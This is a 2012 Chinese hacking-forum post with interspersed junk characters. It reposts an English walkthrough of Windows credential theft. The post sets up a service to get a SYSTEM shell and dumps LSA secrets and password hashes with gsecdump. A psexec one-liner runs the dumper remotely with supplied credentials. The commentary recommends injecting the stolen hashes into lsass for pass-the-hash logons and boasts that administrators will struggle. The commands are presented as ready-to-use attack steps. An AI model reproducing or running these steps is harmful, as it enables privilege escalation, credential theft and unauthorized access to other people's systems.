找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2328|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:& U) y6 P7 v0 F& t" A: f7 b+ \/ u

2 Y4 `2 }& P+ ~+ u; }C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact- {# h% o0 Z# `( N" i( S  B
[SC] CreateService SUCCESS, s6 ?% g7 n8 y, l0 Y' w$ h

5 V/ W# ?8 E* |, V- b. @C:\>sc start shellcmdline
( s/ q$ v. r4 d6 j$ M# ?0 v[SC] StartService FAILED 1053:0 W( n' M# |/ y& O% x; r

, |% o4 x! O8 L! RThe service did not respond to the start or control request in a timely fashion.
9 |+ F! Q  Q. d* P  z* F- ~4 P6 J, o1 F0 ~, s) n2 w
C:\>sc delete shellcmdline
/ u7 V) t; z) g; v2 d: s2 o1 I7 O[SC] DeleteService SUCCESS
5 G5 \* E3 L* v& |5 X
! v% h8 b$ D# w( Z* M* S# ^------------: h( W/ ]$ @* m- d: f$ \

' L. l" |  o' m3 kThen in the new DOS window:
/ e* I/ y8 G4 w' l1 Y7 Q( V+ b) x' k) L, z1 g! x+ i5 j- d4 d
Microsoft Windows XP [Version 5.1.2600]2 p9 |$ u, Q# G2 [4 l' @
(C) Copyright 1985-2001 Microsoft Corp.' \* |' S, }: x

, J, i0 ^3 `! h3 ~+ m/ hC:\WINDOWS\system32>whoami
( D0 ]+ a' f7 r- |! D$ O- A9 m8 iNT AUTHORITY\SYSTEM+ A& U' }; V5 K3 W: W7 k

+ L( N6 u/ w) W  X$ D/ |$ s. V6 FC:\WINDOWS\system32>gsecdump -h
/ _/ A5 m5 P! c% l5 e3 vgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
, r' U6 Q- i5 ]8 U4 M4 D# qusage: gsecdump [options]0 ?( u( D& t6 o' A$ R. ?* F& F

0 w3 D3 p* p$ M$ E5 z! Goptions:+ t4 C8 F3 ]3 `" O: F/ B, h
-h [ --help ] show help
2 U9 B$ I: b0 D: b4 q-a [ --dump_all ] dump all secrets
' u3 S1 [6 o, R-l [ --dump_lsa ] dump lsa secrets
* D5 [+ V8 E. }; `' B-w [ --dump_wireless ] dump microsoft wireless connections
" u, J  }5 K% M  l: S7 u! F8 Z-u [ --dump_usedhashes ] dump hashes from active logon sessions
( s: }. ~2 L& Z) S7 T-s [ --dump_hashes ] dump hashes from SAM/AD
1 @4 x7 V: Z& N1 C6 C; h
' V2 m7 |5 S1 U' w. h1 Q+ F6 y, nAlthough I like to use:/ j/ r' R9 P7 f
0 ?1 ^5 m' ~8 K0 T2 {/ ?" C  K
PsExec v1.83 - Execute processes remotely
, e! `9 F2 e" `; w+ F. o! K# V, aCopyright (C) 2001-2007 Mark Russinovich& p* ^- q: g. T4 O, T5 c/ q1 R' u
Sysinternals - 链接标记[url]www.sysinternals.com[/url]+ `  y) s& [: E# w# Z" o

! @1 @* L/ ?) X  |  a' _C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
2 Q4 L2 z9 t: t* j& ~
. y. H. ^) L6 Z: B2 G1 f5 @to get the hashes from active logon sessions of a remote system.# h: p* o2 ?7 Y
4 l4 N* B( r5 ]/ ]
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
5 z3 T& m+ M# n+ C% a' B: K0 s
( x' X" h# d1 S: D- F+ h; b提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
* i8 q  A  x* B( L( K原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]; S! z0 g, a: r- c+ R& u. d2 q
' Y; M+ a5 {  h3 R
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。- {9 L. F; v6 H4 K; s! _6 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表